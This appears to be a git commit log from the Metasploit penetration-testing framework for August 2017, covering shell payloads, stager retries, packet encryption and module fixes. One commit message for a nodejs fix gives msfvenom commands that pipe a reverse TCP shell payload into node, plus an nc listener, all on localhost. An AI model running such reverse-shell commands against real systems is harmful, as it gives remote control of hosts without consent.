William Vu
100afaf251
Add ./ to cmd_use for paths and simplify cases
Don't accommodate typos.
2017-08-23 10:24:37 -05:00
Brent Cook
41eba74ddf
prefer Addrinfo over ipaddress gem
2017-08-22 23:03:45 -05:00
Brent Cook
17aef43bb8
Fix UDP scanner mixin with multicast addresses
This fixes #8828 by only binding UDP sockets when we have unicast
targets. If we have multicast, prefer unbound sockets.
This also brings in the 'ipaddress' gem for identifying multicast
addresses. It looks like it could replace a lot of custom-built
functionality in rex-socket, including RangeWalker. Will need to see how
efficient it is.
2017-08-22 06:44:43 -05:00
Brent Cook
29c48f9d8d
cleanup accounts post API
2017-08-21 23:00:57 -05:00
Brent Cook
e3a9ddfc22
fix retry case for acquiring security descriptor
2017-08-21 22:52:53 -05:00
Brent Cook
0d17e94f54
handle unmapped sids consistently
2017-08-21 22:36:26 -05:00
Brent Cook
c14daf3fcc
Land #8857, Reverse and bind shells in R
2017-08-21 15:49:24 -05:00
Brent Cook
605330faf6
Land #8842, add linux/aarch64/shell_reverse_tcp
2017-08-21 15:44:28 -05:00
William Vu
8876919f38
Fix typo s/rport/port/ in build_brute_message
I missed this in #7202.
2017-08-21 12:32:41 -05:00
Brent Cook
429824b5c9
guid is hex values
2017-08-21 03:44:02 -05:00
Brent Cook
8700a36858
make session_guid default with the correct length
2017-08-21 03:24:37 -05:00
Brent Cook
f961495860
Land #8625, Remove OpenSSL from Windows Meterp, packet header changes, and TLV packet encryption
2017-08-20 19:13:51 -05:00
Metasploit
ca7d481658
Bump version of framework to 4.16.0
2017-08-20 16:57:48 -07:00
Brent Cook
5e8c2200ac
Merge branch 'master' into land-8625-crypttlv2
2017-08-20 18:54:51 -05:00
Brent Cook
f7dc831e9a
Land #8799, Add module to detect Docker, LXC, and systemd-nspawn containers
2017-08-20 14:45:57 -05:00
Brent Cook
6afd90b7f0
Land #8848, fix extra sleep on linux x86 stager
2017-08-19 22:12:19 -05:00
RageLtMan
0145fc3972
payload/r.rb and UUID update
2017-08-19 06:43:28 -04:00
Metasploit
95824ce132
Bump version of framework to 4.15.8
2017-08-18 10:03:23 -07:00
h00die
dc358dd087
unknow to unknown
2017-08-18 11:33:48 -04:00
tkmru
74f89857d8
fix extra sleep on linux x86 stager
2017-08-18 15:20:35 +09:00
Tim
8b4ccc66c7
add linux/aarch64/shell_reverse_tcp
2017-08-17 18:55:37 +08:00
William Vu
5b7785438f
Add session naming support to CommandDispatcher
2017-08-16 18:18:49 -05:00
William Vu
6eae3b3d4e
Add session name output to ReadableText
2017-08-16 18:14:56 -05:00
OJ
fa292dce96
Fix issue with truncated values when unpacking packets
2017-08-16 11:01:54 +10:00
Brent Cook
70a82b5c67
Land #8834, add resiliency to x64 linux reverse_tcp stagers
2017-08-15 08:04:32 -04:00
Brent Cook
debbc31142
use separate module names for x86 and x64 generators
2017-08-15 08:02:01 -04:00
tkmru
db2e3f2ddd
add retry to linux reverse tcp x64
2017-08-15 12:49:29 +09:00
Brent Cook
69c4ae99a7
Land #8811, fix peer printing with bruteforce modules
2017-08-14 17:31:48 -04:00
William Vu
1a4db844c0
Refactor build_brute_message for legacy printing
2017-08-14 11:17:34 -05:00
Brent Cook
59086af261
Land #8771, rewrite linux x64 stagers with Metasm
2017-08-14 02:32:29 -04:00
Brent Cook
0ab6dd46d3
Land #8762, add initial Rex FTP protocol implementation
2017-08-14 01:59:53 -04:00
Brent Cook
26193216d1
Land #8686, add 'download' and simplified URI request methods to http client mixin
Updated PDF author metadata downloader to support the new methods.
2017-08-14 01:40:17 -04:00
Brent Cook
5d05ca154a
added http client 'download' method and updates to pdf author module from @bcoles
2017-08-14 01:08:53 -04:00
Patrick Thomas
437fe4b63a
handle missing util.pump in nodejs shell payloads
Modern NodeJS (since 5.3.0) has removed util.pump in favor of stream.pipe.
On current versions the nodejs tcp shell payloads error out:
```
$ node --version
v7.10.0
$ msfvenom -p nodejs/shell_reverse_tcp LHOST=127.0.0.1 LPORT=7777 | node
<snip>
TypeError: util.pump is not a function
    at Socket.<anonymous> ([stdin]:1:405)
    at Object.onceWrapper (events.js:293:19)
    at emitNone (events.js:86:13)
    at Socket.emit (events.js:188:7)
    at TCPConnectWrap.afterConnect [as oncomplete] (net.js:1080:10)
```
With this change, bind and reverse tcp should be tolerant of both new and older versions.
*Reference*
https://github.com/nodejs/node/pull/2531
*Verification steps*
1. Set up a handler (either exploit/multi/handler or simple nc)
```
$ nc -l -v 7777
```
2. Use patched version with various versions of node:
```
msfvenom -p nodejs/shell_reverse_tcp LHOST=127.0.0.1 LPORT=7777 | node
```
3. Confirm both old and new versions of node result in shell, not error.
2017-08-12 20:40:03 -07:00
Metasploit
be926e1d75
Bump version of framework to 4.15.7
2017-08-11 10:12:37 -07:00
Brent Cook
e64eaf1573
remove additional match? for older ruby compat
2017-08-08 19:51:35 -05:00
Brent Cook
3f8ee86e3e
revert match change - this has problems with older ruby versions
2017-08-08 19:47:48 -05:00
Brent Cook
0ac19087cd
Land #8720, add resiliency (retries + sleep) to linux x86 stagers
2017-08-08 19:36:47 -05:00
Brent Cook
4ca68a178b
switch reverse_tcp stagers to all prefer StagerRetryCount
This leaves ReverseConnectRetries as an alternate spelling.
2017-08-08 19:27:00 -05:00
Brent Cook
83212b8b6b
minor code cleanup
2017-08-08 19:26:59 -05:00
Brent Cook
bca8e77163
add alias support for datastore options
2017-08-08 19:26:59 -05:00
Brent Cook
b35d53bd02
code cleanup in opt_int while we're here
2017-08-08 19:06:51 -05:00
Brent Cook
47dc3772a7
add OptFloat datastore option
2017-08-08 19:06:51 -05:00
Brent Cook
331279d891
handle fractional seconds
2017-08-08 19:06:46 -05:00
tkmru
a396d860e7
change SleepSeconds to StagerRetryWait
2017-08-08 19:26:24 +09:00
OJ
d7e8b32312
Merge branch 'upstream/master' into transport-agnostic-packet-encryption
2017-08-08 17:30:51 +10:00
Adam Cammack
1a9a942c1f
Add external module template for capture servers
2017-08-07 13:31:46 -05:00
Pearce Barry
cfd377fbd4
Support padding on the CAN bus.
Also use a hash for passing options around instead of individual params.
2017-08-06 18:05:59 -05:00
james
9858147dae
Add module to detect Docker and LXC containers
Detect Docker by:
- Presence of .dockerenv file.
- Finding "docker" in /proc/1/cgroup
Detect LXC by:
- Finding "lxc" in /proc/1/cgroup
2017-08-05 18:59:36 -05:00
Metasploit
83cd0bc977
Bump version of framework to 4.15.6
2017-08-04 10:07:09 -07:00